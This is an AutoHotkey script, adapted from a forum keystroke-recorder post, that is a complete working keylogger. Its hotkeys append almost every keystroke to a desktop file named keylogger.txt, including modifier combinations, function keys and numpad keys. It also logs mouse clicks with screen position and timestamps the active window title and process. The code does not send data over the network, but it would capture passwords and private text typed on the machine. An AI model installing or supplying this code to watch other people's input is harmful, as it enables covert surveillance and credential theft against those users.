; modified from: 
; http://www.autohotkey.com/board/topic/30294-simple-key-stroke-recorder/
;

#NoEnv ; Recommended for performance and compatibility with future AutoHotkey releases.
log = %A_Desktop%\keylogger.txt

mouseevent(message) {
    global 
    MouseGetPos, x, y, window, controln
    WinGetActiveTitle, Title
    WinGet, ProcessName, ProcessName, A
    FileAppend, `n{%message%} %x% %y% %ProcessName%: %Title%`n, *%log%
}

getwin() {
    global
    WinGetActiveTitle, Title
    WinGet, ProcessName, ProcessName, A
    FormatTime, time, , yyyy-MM-dd-HH:mm:ss
    FileAppend, `n%time% %ProcessName%: %Title%`n, *%log%
}

getwin()

Loop {
    WinWaitNotActive, % "ahk_id " WinActive("A")
    getwin()
}

~a::FileAppend, a, *%log%
~#a::FileAppend, a, *%log%
~!a::FileAppend, a, *%log%
~^a::FileAppend, a, *%log%
~b::FileAppend, b, *%log%
~#b::FileAppend, b, *%log%
~!b::FileAppend, b, *%log%
~^b::FileAppend, b, *%log%
~c::FileAppend, c, *%log%
~#c::FileAppend, c, *%log%
~!c::FileAppend, c, *%log%
~^c::FileAppend, c, *%log%
~d::FileAppend, d, *%log%
~#d::FileAppend, d, *%log%
~!d::FileAppend, d, *%log%
~^d::FileAppend, d, *%log%
~e::FileAppend, e, *%log%
~#e::FileAppend, e, *%log%
~!e::FileAppend, e, *%log%
~^e::FileAppend, e, *%log%
~f::FileAppend, f, *%log%
~#f::FileAppend, f, *%log%
~!f::FileAppend, f, *%log%
~^f::FileAppend, f, *%log%
~g::FileAppend, g, *%log%
~#g::FileAppend, g, *%log%
~!g::FileAppend, g, *%log%
~^g::FileAppend, g, *%log%
~h::FileAppend, h, *%log%
~#h::FileAppend, h, *%log%
~!h::FileAppend, h, *%log%
~^h::FileAppend, h, *%log%
~i::FileAppend, i, *%log%
~#i::FileAppend, i, *%log%
~!i::FileAppend, i, *%log%
~^i::FileAppend, i, *%log%
~j::FileAppend, j, *%log%
~#j::FileAppend, j, *%log%
~!j::FileAppend, j, *%log%
~^j::FileAppend, j, *%log%
~k::FileAppend, k, *%log%
~#k::FileAppend, k, *%log%
~!k::FileAppend, k, *%log%
~^k::FileAppend, k, *%log%
~l::FileAppend, l, *%log%
~#l::FileAppend, l, *%log%
~!l::FileAppend, l, *%log%
~^l::FileAppend, l, *%log%
~m::FileAppend, m, *%log%
~#m::FileAppend, m, *%log%
~!m::FileAppend, m, *%log%
~^m::FileAppend, m, *%log%
~n::FileAppend, n, *%log%
~#n::FileAppend, n, *%log%
~!n::FileAppend, n, *%log%
~^n::FileAppend, n, *%log%
~o::FileAppend, o, *%log%
~#o::FileAppend, o, *%log%
~!o::FileAppend, o, *%log%
~^o::FileAppend, o, *%log%
~p::FileAppend, p, *%log%
~#p::FileAppend, p, *%log%
~!p::FileAppend, p, *%log%
~^p::FileAppend, p, *%log%
~q::FileAppend, q, *%log%
~#q::FileAppend, q, *%log%
~!q::FileAppend, q, *%log%
~^q::FileAppend, q, *%log%
~r::FileAppend, r, *%log%
~#r::FileAppend, r, *%log%
~!r::FileAppend, r, *%log%
~^r::FileAppend, r, *%log%
~s::FileAppend, s, *%log%
~#s::FileAppend, s, *%log%
~!s::FileAppend, s, *%log%
~^s::FileAppend, s, *%log%
~t::FileAppend, t, *%log%
~#t::FileAppend, t, *%log%
~!t::FileAppend, t, *%log%
~^t::FileAppend, t, *%log%
~u::FileAppend, u, *%log%
~#u::FileAppend, u, *%log%
~!u::FileAppend, u, *%log%
~^u::FileAppend, u, *%log%
~v::FileAppend, v, *%log%
~#v::FileAppend, v, *%log%
~!v::FileAppend, v, *%log%
~^v::FileAppend, v, *%log%
~w::FileAppend, w, *%log%
~#w::FileAppend, w, *%log%
~!w::FileAppend, w, *%log%
~^w::FileAppend, w, *%log%
~x::FileAppend, x, *%log%
~#x::FileAppend, x, *%log%
~!x::FileAppend, x, *%log%
~^x::FileAppend, x, *%log%
~y::FileAppend, y, *%log%
~#y::FileAppend, y, *%log%
~!y::FileAppend, y, *%log%
~^y::FileAppend, y, *%log%
~z::FileAppend, z, *%log%
~#z::FileAppend, z, *%log%
~!z::FileAppend, z, *%log%
~^z::FileAppend, z, *%log%
~+A::FileAppend, A, *%log%
~#+A::FileAppend, A, *%log%
~!+A::FileAppend, A, *%log%
~^+A::FileAppend, A, *%log%
~+B::FileAppend, B, *%log%
~#+B::FileAppend, B, *%log%
~!+B::FileAppend, B, *%log%
~^+B::FileAppend, B, *%log%
~+C::FileAppend, C, *%log%
~#+C::FileAppend, C, *%log%
~!+C::FileAppend, C, *%log%
~^+C::FileAppend, C, *%log%
~+D::FileAppend, D, *%log%
~#+D::FileAppend, D, *%log%
~!+D::FileAppend, D, *%log%
~^+D::FileAppend, D, *%log%
~+E::FileAppend, E, *%log%
~#+E::FileAppend, E, *%log%
~!+E::FileAppend, E, *%log%
~^+E::FileAppend, E, *%log%
~+F::FileAppend, F, *%log%
~#+F::FileAppend, F, *%log%
~!+F::FileAppend, F, *%log%
~^+F::FileAppend, F, *%log%
~+G::FileAppend, G, *%log%
~#+G::FileAppend, G, *%log%
~!+G::FileAppend, G, *%log%
~^+G::FileAppend, G, *%log%
~+H::FileAppend, H, *%log%
~#+H::FileAppend, H, *%log%
~!+H::FileAppend, H, *%log%
~^+H::FileAppend, H, *%log%
~+I::FileAppend, I, *%log%
~#+I::FileAppend, I, *%log%
~!+I::FileAppend, I, *%log%
~^+I::FileAppend, I, *%log%
~+J::FileAppend, J, *%log%
~#+J::FileAppend, J, *%log%
~!+J::FileAppend, J, *%log%
~^+J::FileAppend, J, *%log%
~+K::FileAppend, K, *%log%
~#+K::FileAppend, K, *%log%
~!+K::FileAppend, K, *%log%
~^+K::FileAppend, K, *%log%
~+L::FileAppend, L, *%log%
~#+L::FileAppend, L, *%log%
~!+L::FileAppend, L, *%log%
~^+L::FileAppend, L, *%log%
~+M::FileAppend, M, *%log%
~#+M::FileAppend, M, *%log%
~!+M::FileAppend, M, *%log%
~^+M::FileAppend, M, *%log%
~+N::FileAppend, N, *%log%
~#+N::FileAppend, N, *%log%
~!+N::FileAppend, N, *%log%
~^+N::FileAppend, N, *%log%
~+O::FileAppend, O, *%log%
~#+O::FileAppend, O, *%log%
~!+O::FileAppend, O, *%log%
~^+O::FileAppend, O, *%log%
~+P::FileAppend, P, *%log%
~#+P::FileAppend, P, *%log%
~!+P::FileAppend, P, *%log%
~^+P::FileAppend, P, *%log%
~+Q::FileAppend, Q, *%log%
~#+Q::FileAppend, Q, *%log%
~!+Q::FileAppend, Q, *%log%
~^+Q::FileAppend, Q, *%log%
~+R::FileAppend, R, *%log%
~#+R::FileAppend, R, *%log%
~!+R::FileAppend, R, *%log%
~^+R::FileAppend, R, *%log%
~+S::FileAppend, S, *%log%
~#+S::FileAppend, S, *%log%
~!+S::FileAppend, S, *%log%
~^+S::FileAppend, S, *%log%
~+T::FileAppend, T, *%log%
~#+T::FileAppend, T, *%log%
~!+T::FileAppend, T, *%log%
~^+T::FileAppend, T, *%log%
~+U::FileAppend, U, *%log%
~#+U::FileAppend, U, *%log%
~!+U::FileAppend, U, *%log%
~^+U::FileAppend, U, *%log%
~+V::FileAppend, V, *%log%
~#+V::FileAppend, V, *%log%
~!+V::FileAppend, V, *%log%
~^+V::FileAppend, V, *%log%
~+W::FileAppend, W, *%log%
~#+W::FileAppend, W, *%log%
~!+W::FileAppend, W, *%log%
~^+W::FileAppend, W, *%log%
~+X::FileAppend, X, *%log%
~#+X::FileAppend, X, *%log%
~!+X::FileAppend, X, *%log%
~^+X::FileAppend, X, *%log%
~+Y::FileAppend, Y, *%log%
~#+Y::FileAppend, Y, *%log%
~!+Y::FileAppend, Y, *%log%
~^+Y::FileAppend, Y, *%log%
~+Z::FileAppend, Z, *%log%
~#+Z::FileAppend, Z, *%log%
~!+Z::FileAppend, Z, *%log%
~^+Z::FileAppend, Z, *%log%
~`::FileAppend, ``, *%log%
~#`::FileAppend, ``, *%log%
~!`::FileAppend, ``, *%log%
~^`::FileAppend, ``, *%log%
~!::FileAppend, !, *%log%
~#!::FileAppend, !, *%log%
~!!::FileAppend, !, *%log%
~^!::FileAppend, !, *%log%
~@::FileAppend, @, *%log%
~#@::FileAppend, @, *%log%
~!@::FileAppend, @, *%log%
~^@::FileAppend, @, *%log%
~#::FileAppend, #, *%log%
~##::FileAppend, #, *%log%
~!#::FileAppend, #, *%log%
~^#::FileAppend, #, *%log%
~$::FileAppend, $, *%log%
~#$::FileAppend, $, *%log%
~!$::FileAppend, $, *%log%
~^$::FileAppend, $, *%log%
~^::FileAppend, ^, *%log%
~#^::FileAppend, ^, *%log%
~!^::FileAppend, ^, *%log%
~^^::FileAppend, ^, *%log%
~&::FileAppend, &, *%log%
~#&::FileAppend, &, *%log%
~!&::FileAppend, &, *%log%
~^&::FileAppend, &, *%log%
~*::FileAppend, *, *%log%
~#*::FileAppend, *, *%log%
~!*::FileAppend, *, *%log%
~^*::FileAppend, *, *%log%
~(::FileAppend, (, *%log%
~#(::FileAppend, (, *%log%
~!(::FileAppend, (, *%log%
~^(::FileAppend, (, *%log%
~)::FileAppend, ), *%log%
~#)::FileAppend, ), *%log%
~!)::FileAppend, ), *%log%
~^)::FileAppend, ), *%log%
~-::FileAppend, -, *%log%
~#-::FileAppend, -, *%log%
~!-::FileAppend, -, *%log%
~^-::FileAppend, -, *%log%
~_::FileAppend, _, *%log%
~#_::FileAppend, _, *%log%
~!_::FileAppend, _, *%log%
~^_::FileAppend, _, *%log%
~=::FileAppend, =, *%log%
~#=::FileAppend, =, *%log%
~!=::FileAppend, =, *%log%
~^=::FileAppend, =, *%log%
~+::FileAppend, +, *%log%
~#+::FileAppend, +, *%log%
~!+::FileAppend, +, *%log%
~^+::FileAppend, +, *%log%
~[::FileAppend, [, *%log%
~#[::FileAppend, [, *%log%
~![::FileAppend, [, *%log%
~^[::FileAppend, [, *%log%
~{::FileAppend, {, *%log%
~#{::FileAppend, {, *%log%
~!{::FileAppend, {, *%log%
~^{::FileAppend, {, *%log%
~]::FileAppend, ], *%log%
~#]::FileAppend, ], *%log%
~!]::FileAppend, ], *%log%
~^]::FileAppend, ], *%log%
~}::FileAppend, }, *%log%
~#}::FileAppend, }, *%log%
~!}::FileAppend, }, *%log%
~^}::FileAppend, }, *%log%
~\::FileAppend, \, *%log%
~#\::FileAppend, \, *%log%
~!\::FileAppend, \, *%log%
~^\::FileAppend, \, *%log%
~|::FileAppend, |, *%log%
~#|::FileAppend, |, *%log%
~!|::FileAppend, |, *%log%
~^|::FileAppend, |, *%log%
~+;::FileAppend, :, *%log%
~#+;::FileAppend, :, *%log%
~!+;::FileAppend, :, *%log%
~^+;::FileAppend, :, *%log%
~;::FileAppend, `;, *%log%
~#;::FileAppend, `;, *%log%
~!;::FileAppend, `;, *%log%
~^;::FileAppend, `;, *%log%
~SC028::FileAppend, ', *%log%
~#SC028::FileAppend, ', *%log%
~!SC028::FileAppend, ', *%log%
~^SC028::FileAppend, ', *%log%
~+SC028::FileAppend, ", *%log%
~#+SC028::FileAppend, ", *%log%
~!+SC028::FileAppend, ", *%log%
~^+SC028::FileAppend, ", *%log%
~,::FileAppend, {comma}, *%log%
~#,::FileAppend, {comma}, *%log%
~!,::FileAppend, {comma}, *%log%
~^,::FileAppend, {comma}, *%log%
~.::FileAppend, ., *%log%
~#.::FileAppend, ., *%log%
~!.::FileAppend, ., *%log%
~^.::FileAppend, ., *%log%
~<::FileAppend, <, *%log%
~#<::FileAppend, <, *%log%
~!<::FileAppend, <, *%log%
~^<::FileAppend, <, *%log%
~>::FileAppend, >, *%log%
~#>::FileAppend, >, *%log%
~!>::FileAppend, >, *%log%
~^>::FileAppend, >, *%log%
~/::FileAppend, /, *%log%
~#/::FileAppend, /, *%log%
~!/::FileAppend, /, *%log%
~^/::FileAppend, /, *%log%
~?::FileAppend, ?, *%log%
~#?::FileAppend, ?, *%log%
~!?::FileAppend, ?, *%log%
~^?::FileAppend, ?, *%log%
~1::FileAppend, 1, *%log%
~#1::FileAppend, 1, *%log%
~!1::FileAppend, 1, *%log%
~^1::FileAppend, 1, *%log%
~2::FileAppend, 2, *%log%
~#2::FileAppend, 2, *%log%
~!2::FileAppend, 2, *%log%
~^2::FileAppend, 2, *%log%
~3::FileAppend, 3, *%log%
~#3::FileAppend, 3, *%log%
~!3::FileAppend, 3, *%log%
~^3::FileAppend, 3, *%log%
~4::FileAppend, 4, *%log%
~#4::FileAppend, 4, *%log%
~!4::FileAppend, 4, *%log%
~^4::FileAppend, 4, *%log%
~5::FileAppend, 5, *%log%
~#5::FileAppend, 5, *%log%
~!5::FileAppend, 5, *%log%
~^5::FileAppend, 5, *%log%
~6::FileAppend, 6, *%log%
~#6::FileAppend, 6, *%log%
~!6::FileAppend, 6, *%log%
~^6::FileAppend, 6, *%log%
~7::FileAppend, 7, *%log%
~#7::FileAppend, 7, *%log%
~!7::FileAppend, 7, *%log%
~^7::FileAppend, 7, *%log%
~8::FileAppend, 8, *%log%
~#8::FileAppend, 8, *%log%
~!8::FileAppend, 8, *%log%
~^8::FileAppend, 8, *%log%
~9::FileAppend, 9, *%log%
~#9::FileAppend, 9, *%log%
~!9::FileAppend, 9, *%log%
~^9::FileAppend, 9, *%log%
~0::FileAppend, 0, *%log%
~#0::FileAppend, 0, *%log%
~!0::FileAppend, 0, *%log%
~^0::FileAppend, 0, *%log%
~Space::FileAppend, %A_Space%, *%log%
~#Space::FileAppend, %A_Space%, *%log%
~!Space::FileAppend, %A_Space%, *%log%
~^Space::FileAppend, %A_Space%, *%log%
~Tab::FileAppend, {Tab}, *%log%
~#Tab::FileAppend, {Tab}, *%log%
~!Tab::FileAppend, {Tab}, *%log%
~^Tab::FileAppend, {Tab}, *%log%
~Enter::FileAppend, {Enter}`n, *%log%
~#Enter::FileAppend, {Enter}`n, *%log%
~!Enter::FileAppend, {Enter}`n, *%log%
~^Enter::FileAppend, {Enter}`n, *%log%
~Esc::FileAppend, {Esc}, *%log%
~#Esc::FileAppend, {Esc}, *%log%
~!Esc::FileAppend, {Esc}, *%log%
~^Esc::FileAppend, {Esc}, *%log%
~SC00E::FileAppend, {BS}, *%log%
~#SC00E::FileAppend, {BS}, *%log%
~!SC00E::FileAppend, {BS}, *%log%
~^SC00E::FileAppend, {BS}, *%log%
~Pause::FileAppend, {Pause}, *%log%
~#Pause::FileAppend, {Pause}, *%log%
~!Pause::FileAppend, {Pause}, *%log%
~^Pause::FileAppend, {Pause}, *%log%
~ScrollLock::FileAppend, {ScrollLock}, *%log%
~#ScrollLock::FileAppend, {ScrollLock}, *%log%
~!ScrollLock::FileAppend, {ScrollLock}, *%log%
~^ScrollLock::FileAppend, {ScrollLock}, *%log%
~Delete::FileAppend, {Delete}, *%log%
~#Delete::FileAppend, {Delete}, *%log%
~!Delete::FileAppend, {Delete}, *%log%
~^Delete::FileAppend, {Delete}, *%log%
~Insert::FileAppend, {Insert}, *%log%
~#Insert::FileAppend, {Insert}, *%log%
~!Insert::FileAppend, {Insert}, *%log%
~^Insert::FileAppend, {Insert}, *%log%
~Home::FileAppend, {Home}, *%log%
~#Home::FileAppend, {Home}, *%log%
~!Home::FileAppend, {Home}, *%log%
~^Home::FileAppend, {Home}, *%log%
~End::FileAppend, {End}, *%log%
~#End::FileAppend, {End}, *%log%
~!End::FileAppend, {End}, *%log%
~^End::FileAppend, {End}, *%log%
~PgUp::FileAppend, {PgUp}, *%log%
~#PgUp::FileAppend, {PgUp}, *%log%
~!PgUp::FileAppend, {PgUp}, *%log%
~^PgUp::FileAppend, {PgUp}, *%log%
~PgDn::FileAppend, {PgDn}, *%log%
~#PgDn::FileAppend, {PgDn}, *%log%
~!PgDn::FileAppend, {PgDn}, *%log%
~^PgDn::FileAppend, {PgDn}, *%log%
~Up::FileAppend, {Up}, *%log%
~#Up::FileAppend, {Up}, *%log%
~!Up::FileAppend, {Up}, *%log%
~^Up::FileAppend, {Up}, *%log%
~Down::FileAppend, {Down}, *%log%
~#Down::FileAppend, {Down}, *%log%
~!Down::FileAppend, {Down}, *%log%
~^Down::FileAppend, {Down}, *%log%
~Left::FileAppend, {Left}, *%log%
~#Left::FileAppend, {Left}, *%log%
~!Left::FileAppend, {Left}, *%log%
~^Left::FileAppend, {Left}, *%log%
~Right::FileAppend, {Right}, *%log%
~#Right::FileAppend, {Right}, *%log%
~!Right::FileAppend, {Right}, *%log%
~^Right::FileAppend, {Right}, *%log%
~CapsLock::FileAppend, {CapsLock}, *%log%
~#CapsLock::FileAppend, {CapsLock}, *%log%
~!CapsLock::FileAppend, {CapsLock}, *%log%
~^CapsLock::FileAppend, {CapsLock}, *%log%
~NumLock::FileAppend, {NumLock}, *%log%
~#NumLock::FileAppend, {NumLock}, *%log%
~!NumLock::FileAppend, {NumLock}, *%log%
~^NumLock::FileAppend, {NumLock}, *%log%
~Numpad0::FileAppend, {Numpad0}, *%log%
~#Numpad0::FileAppend, {Numpad0}, *%log%
~!Numpad0::FileAppend, {Numpad0}, *%log%
~^Numpad0::FileAppend, {Numpad0}, *%log%
~Numpad1::FileAppend, {Numpad1}, *%log%
~#Numpad1::FileAppend, {Numpad1}, *%log%
~!Numpad1::FileAppend, {Numpad1}, *%log%
~^Numpad1::FileAppend, {Numpad1}, *%log%
~Numpad2::FileAppend, {Numpad2}, *%log%
~#Numpad2::FileAppend, {Numpad2}, *%log%
~!Numpad2::FileAppend, {Numpad2}, *%log%
~^Numpad2::FileAppend, {Numpad2}, *%log%
~Numpad3::FileAppend, {Numpad3}, *%log%
~#Numpad3::FileAppend, {Numpad3}, *%log%
~!Numpad3::FileAppend, {Numpad3}, *%log%
~^Numpad3::FileAppend, {Numpad3}, *%log%
~Numpad4::FileAppend, {Numpad4}, *%log%
~#Numpad4::FileAppend, {Numpad4}, *%log%
~!Numpad4::FileAppend, {Numpad4}, *%log%
~^Numpad4::FileAppend, {Numpad4}, *%log%
~Numpad5::FileAppend, {Numpad5}, *%log%
~#Numpad5::FileAppend, {Numpad5}, *%log%
~!Numpad5::FileAppend, {Numpad5}, *%log%
~^Numpad5::FileAppend, {Numpad5}, *%log%
~Numpad6::FileAppend, {Numpad6}, *%log%
~#Numpad6::FileAppend, {Numpad6}, *%log%
~!Numpad6::FileAppend, {Numpad6}, *%log%
~^Numpad6::FileAppend, {Numpad6}, *%log%
~Numpad7::FileAppend, {Numpad7}, *%log%
~#Numpad7::FileAppend, {Numpad7}, *%log%
~!Numpad7::FileAppend, {Numpad7}, *%log%
~^Numpad7::FileAppend, {Numpad7}, *%log%
~Numpad8::FileAppend, {Numpad8}, *%log%
~#Numpad8::FileAppend, {Numpad8}, *%log%
~!Numpad8::FileAppend, {Numpad8}, *%log%
~^Numpad8::FileAppend, {Numpad8}, *%log%
~Numpad9::FileAppend, {Numpad9}, *%log%
~#Numpad9::FileAppend, {Numpad9}, *%log%
~!Numpad9::FileAppend, {Numpad9}, *%log%
~^Numpad9::FileAppend, {Numpad9}, *%log%
~NumpadAdd::FileAppend, {NumpadAdd}, *%log%
~#NumpadAdd::FileAppend, {NumpadAdd}, *%log%
~!NumpadAdd::FileAppend, {NumpadAdd}, *%log%
~^NumpadAdd::FileAppend, {NumpadAdd}, *%log%
~NumpadClear::FileAppend, {NumpadClear}, *%log%
~#NumpadClear::FileAppend, {NumpadClear}, *%log%
~!NumpadClear::FileAppend, {NumpadClear}, *%log%
~^NumpadClear::FileAppend, {NumpadClear}, *%log%
~NumpadDel::FileAppend, {NumpadDel}, *%log%
~#NumpadDel::FileAppend, {NumpadDel}, *%log%
~!NumpadDel::FileAppend, {NumpadDel}, *%log%
~^NumpadDel::FileAppend, {NumpadDel}, *%log%
~NumpadDiv::FileAppend, {NumpadDiv}, *%log%
~#NumpadDiv::FileAppend, {NumpadDiv}, *%log%
~!NumpadDiv::FileAppend, {NumpadDiv}, *%log%
~^NumpadDiv::FileAppend, {NumpadDiv}, *%log%
~NumpadDot::FileAppend, {NumpadDot}, *%log%
~#NumpadDot::FileAppend, {NumpadDot}, *%log%
~!NumpadDot::FileAppend, {NumpadDot}, *%log%
~^NumpadDot::FileAppend, {NumpadDot}, *%log%
~NumpadDown::FileAppend, {NumpadDown}, *%log%
~#NumpadDown::FileAppend, {NumpadDown}, *%log%
~!NumpadDown::FileAppend, {NumpadDown}, *%log%
~^NumpadDown::FileAppend, {NumpadDown}, *%log%
~NumpadEnd::FileAppend, {NumpadEnd}, *%log%
~#NumpadEnd::FileAppend, {NumpadEnd}, *%log%
~!NumpadEnd::FileAppend, {NumpadEnd}, *%log%
~^NumpadEnd::FileAppend, {NumpadEnd}, *%log%
~NumpadEnter::FileAppend, {NumpadEnter}, *%log%
~#NumpadEnter::FileAppend, {NumpadEnter}, *%log%
~!NumpadEnter::FileAppend, {NumpadEnter}, *%log%
~^NumpadEnter::FileAppend, {NumpadEnter}, *%log%
~NumpadHome::FileAppend, {NumpadHome}, *%log%
~#NumpadHome::FileAppend, {NumpadHome}, *%log%
~!NumpadHome::FileAppend, {NumpadHome}, *%log%
~^NumpadHome::FileAppend, {NumpadHome}, *%log%
~NumpadIns::FileAppend, {NumpadIns}, *%log%
~#NumpadIns::FileAppend, {NumpadIns}, *%log%
~!NumpadIns::FileAppend, {NumpadIns}, *%log%
~^NumpadIns::FileAppend, {NumpadIns}, *%log%
~NumpadLeft::FileAppend, {NumpadLeft}, *%log%
~#NumpadLeft::FileAppend, {NumpadLeft}, *%log%
~!NumpadLeft::FileAppend, {NumpadLeft}, *%log%
~^NumpadLeft::FileAppend, {NumpadLeft}, *%log%
~NumpadMult::FileAppend, {NumpadMult}, *%log%
~#NumpadMult::FileAppend, {NumpadMult}, *%log%
~!NumpadMult::FileAppend, {NumpadMult}, *%log%
~^NumpadMult::FileAppend, {NumpadMult}, *%log%
~NumpadPgDn::FileAppend, {NumpadPgDn}, *%log%
~#NumpadPgDn::FileAppend, {NumpadPgDn}, *%log%
~!NumpadPgDn::FileAppend, {NumpadPgDn}, *%log%
~^NumpadPgDn::FileAppend, {NumpadPgDn}, *%log%
~NumpadPgUp::FileAppend, {NumpadPgUp}, *%log%
~#NumpadPgUp::FileAppend, {NumpadPgUp}, *%log%
~!NumpadPgUp::FileAppend, {NumpadPgUp}, *%log%
~^NumpadPgUp::FileAppend, {NumpadPgUp}, *%log%
~NumpadRight::FileAppend, {NumpadRight}, *%log%
~#NumpadRight::FileAppend, {NumpadRight}, *%log%
~!NumpadRight::FileAppend, {NumpadRight}, *%log%
~^NumpadRight::FileAppend, {NumpadRight}, *%log%
~NumpadSub::FileAppend, {NumpadSub}, *%log%
~#NumpadSub::FileAppend, {NumpadSub}, *%log%
~!NumpadSub::FileAppend, {NumpadSub}, *%log%
~^NumpadSub::FileAppend, {NumpadSub}, *%log%
~NumpadUp::FileAppend, {NumpadUp}, *%log%
~#NumpadUp::FileAppend, {NumpadUp}, *%log%
~!NumpadUp::FileAppend, {NumpadUp}, *%log%
~^NumpadUp::FileAppend, {NumpadUp}, *%log%
~F1::FileAppend, {F1}, *%log%
~#F1::FileAppend, {F1}, *%log%
~!F1::FileAppend, {F1}, *%log%
~^F1::FileAppend, {F1}, *%log%
~F2::FileAppend, {F2}, *%log%
~#F2::FileAppend, {F2}, *%log%
~!F2::FileAppend, {F2}, *%log%
~^F2::FileAppend, {F2}, *%log%
~F3::FileAppend, {F3}, *%log%
~#F3::FileAppend, {F3}, *%log%
~!F3::FileAppend, {F3}, *%log%
~^F3::FileAppend, {F3}, *%log%
~F4::FileAppend, {F4}, *%log%
~#F4::FileAppend, {F4}, *%log%
~!F4::FileAppend, {F4}, *%log%
~^F4::FileAppend, {F4}, *%log%
~F5::FileAppend, {F5}, *%log%
~#F5::FileAppend, {F5}, *%log%
~!F5::FileAppend, {F5}, *%log%
~^F5::FileAppend, {F5}, *%log%
~F6::FileAppend, {F6}, *%log%
~#F6::FileAppend, {F6}, *%log%
~!F6::FileAppend, {F6}, *%log%
~^F6::FileAppend, {F6}, *%log%
~F7::FileAppend, {F7}, *%log%
~#F7::FileAppend, {F7}, *%log%
~!F7::FileAppend, {F7}, *%log%
~^F7::FileAppend, {F7}, *%log%
~F8::FileAppend, {F8}, *%log%
~#F8::FileAppend, {F8}, *%log%
~!F8::FileAppend, {F8}, *%log%
~^F8::FileAppend, {F8}, *%log%
~F9::FileAppend, {F9}, *%log%
~#F9::FileAppend, {F9}, *%log%
~!F9::FileAppend, {F9}, *%log%
~^F9::FileAppend, {F9}, *%log%
~F10::FileAppend, {F10}, *%log%
~#F10::FileAppend, {F10}, *%log%
~!F10::FileAppend, {F10}, *%log%
~^F10::FileAppend, {F10}, *%log%
~F11::FileAppend, {F11}, *%log%
~#F11::FileAppend, {F11}, *%log%
~!F11::FileAppend, {F11}, *%log%
~^F11::FileAppend, {F11}, *%log%
~F12::FileAppend, {F12}, *%log%
~#F12::FileAppend, {F12}, *%log%
~!F12::FileAppend, {F12}, *%log%
~^F12::FileAppend, {F12}, *%log%
~F13::FileAppend, {F13}, *%log%
~#F13::FileAppend, {F13}, *%log%
~!F13::FileAppend, {F13}, *%log%
~^F13::FileAppend, {F13}, *%log%
~F14::FileAppend, {F14}, *%log%
~#F14::FileAppend, {F14}, *%log%
~!F14::FileAppend, {F14}, *%log%
~^F14::FileAppend, {F14}, *%log%
~F15::FileAppend, {F15}, *%log%
~#F15::FileAppend, {F15}, *%log%
~!F15::FileAppend, {F15}, *%log%
~^F15::FileAppend, {F15}, *%log%
~F16::FileAppend, {F16}, *%log%
~#F16::FileAppend, {F16}, *%log%
~!F16::FileAppend, {F16}, *%log%
~^F16::FileAppend, {F16}, *%log%
~F17::FileAppend, {F17}, *%log%
~#F17::FileAppend, {F17}, *%log%
~!F17::FileAppend, {F17}, *%log%
~^F17::FileAppend, {F17}, *%log%
~F18::FileAppend, {F18}, *%log%
~#F18::FileAppend, {F18}, *%log%
~!F18::FileAppend, {F18}, *%log%
~^F18::FileAppend, {F18}, *%log%
~F19::FileAppend, {F19}, *%log%
~#F19::FileAppend, {F19}, *%log%
~!F19::FileAppend, {F19}, *%log%
~^F19::FileAppend, {F19}, *%log%
~F20::FileAppend, {F20}, *%log%
~#F20::FileAppend, {F20}, *%log%
~!F20::FileAppend, {F20}, *%log%
~^F20::FileAppend, {F20}, *%log%
~F21::FileAppend, {F21}, *%log%
~#F21::FileAppend, {F21}, *%log%
~!F21::FileAppend, {F21}, *%log%
~^F21::FileAppend, {F21}, *%log%
~F22::FileAppend, {F22}, *%log%
~#F22::FileAppend, {F22}, *%log%
~!F22::FileAppend, {F22}, *%log%
~^F22::FileAppend, {F22}, *%log%
~F23::FileAppend, {F23}, *%log%
~#F23::FileAppend, {F23}, *%log%
~!F23::FileAppend, {F23}, *%log%
~^F23::FileAppend, {F23}, *%log%
~F24::FileAppend, {F24}, *%log%
~#F24::FileAppend, {F24}, *%log%
~!F24::FileAppend, {F24}, *%log%
~^F24::FileAppend, {F24}, *%log%
~AppsKey::FileAppend, {AppsKey}, *%log%
~#AppsKey::FileAppend, {AppsKey}, *%log%
~!AppsKey::FileAppend, {AppsKey}, *%log%
~^AppsKey::FileAppend, {AppsKey}, *%log%

~PrintScreen::FileAppend, {PrintScreen}, *%log%
~#PrintScreen::FileAppend, {PrintScreen}, *%log%
~!PrintScreen::FileAppend, {PrintScreen}, *%log%
~^PrintScreen::FileAppend, {PrintScreen}, *%log%

~LButton::mouseevent("LButton")
~#LButton::mouseevent("LButton")
~!LButton::mouseevent("LButton")
~^LButton::mouseevent("LButton")
~MButton::mouseevent("MButton")
~#MButton::mouseevent("MButton")
~!MButton::mouseevent("MButton")
~^MButton::mouseevent("MButton")
~RButton::mouseevent("RButton")
~#RButton::mouseevent("RButton")
~!RButton::mouseevent("RButton")
~^RButton::mouseevent("RButton")
~WheelDown::mouseevent("WheelDown")
~#WheelDown::mouseevent("WheelDown")
~!WheelDown::mouseevent("WheelDown")
~^WheelDown::mouseevent("WheelDown")
~WheelUp::mouseevent("WheelUp")
~#WheelUp::mouseevent("WheelUp")
~!WheelUp::mouseevent("WheelUp")
~^WheelUp::mouseevent("WheelUp")
~WheelLeft::mouseevent("WheelLeft")
~#WheelLeft::mouseevent("WheelLeft")
~!WheelLeft::mouseevent("WheelLeft")
~^WheelLeft::mouseevent("WheelLeft")
~WheelRight::mouseevent("WheelRight")
~#WheelRight::mouseevent("WheelRight")
~!WheelRight::mouseevent("WheelRight")
~^WheelRight::mouseevent("WheelRight")

~LWin::FileAppend, {LWin}, *%log%
~RWin::FileAppend, {RWin}, *%log%
~LControl::FileAppend, {LControl}, *%log%
~RControl::FileAppend, {RControl}, *%log%
~LShift::FileAppend, {LShift}, *%log%
~RShift::FileAppend, {RShift}, *%log%
~LAlt::FileAppend, {LAlt}, *%log%
~RAlt::FileAppend, {RAlt}, *%log%

